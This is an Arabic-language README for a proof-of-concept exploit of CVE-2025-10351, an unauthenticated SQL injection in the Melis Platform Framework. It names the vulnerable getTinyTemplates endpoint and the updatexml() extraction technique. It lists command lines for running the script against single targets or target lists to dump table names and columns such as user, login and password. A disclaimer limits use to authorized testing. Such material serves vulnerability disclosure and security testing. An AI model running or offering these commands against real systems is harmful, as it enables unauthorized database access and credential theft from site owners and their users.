
استغلال لثغرة CVE-2025-10351. حقن SQL في Melis Platform Framework
POC لـ CVE-2025-10351: ثغرة حقن SQL غير مصادق عليها تؤثر على نقطة نهاية محددة في إطار عمل Melis Platform.
يستهدف هذا POC ثغرة حقن SQL غير مصادق عليها قائمة على الأخطاء (error-based) في نقطة النهاية:
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
يستغل updatexml() في MySQL لاستخراج:
كما يكتشف ناقلات حقن SQL المستند إلى الوقت (time-based SQLi) المحتملة لاستغلال يدوي إضافي.
ثبّت التبعيات باستخدام:
pip3 install -r requirements.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
python3 CVE-2025-10351-POC.py -l targets.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
tables_extracted.txt<table_name>_data.txtهذا المستند مخصص لاختبار الأمان والتصحيح المصرح بهما فقط. لا تستخدم هذا الـ PoC أو خطوات إعادة الإنتاج ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن سوء الاستخدام.
صُنع بـ ❤️ بواسطة Manuel Iván San Martín Castillo
| الوسيط | الوصف |
|---|
-u | عنوان الهدف |
-p | المنفذ (80، 443، إلخ.) |
-l | ملف يحتوي على قائمة عناوين URL |
-s | وقت الانتظار لاختبارات time-based (الافتراضي: 1 ثانية) |
-at | تفريغ جميع أسماء الجداول |
-t | تحديد اسم الجدول |
-ac | تفريغ جميع أعمدة الجدول المحدد |
-c | قائمة بأسماء الأعمدة مفصولة بفواصل لتفريغها |
--proxy | بروكسي Burp http://127.0.0.1:8080 |
--insecure | تعطيل فحوصات TLS عند استخدام اتصالات البروكسي |
--cookie | ملفات تعريف الارتباط لطلبات المصادقة |
--debug | وضع التصحيح |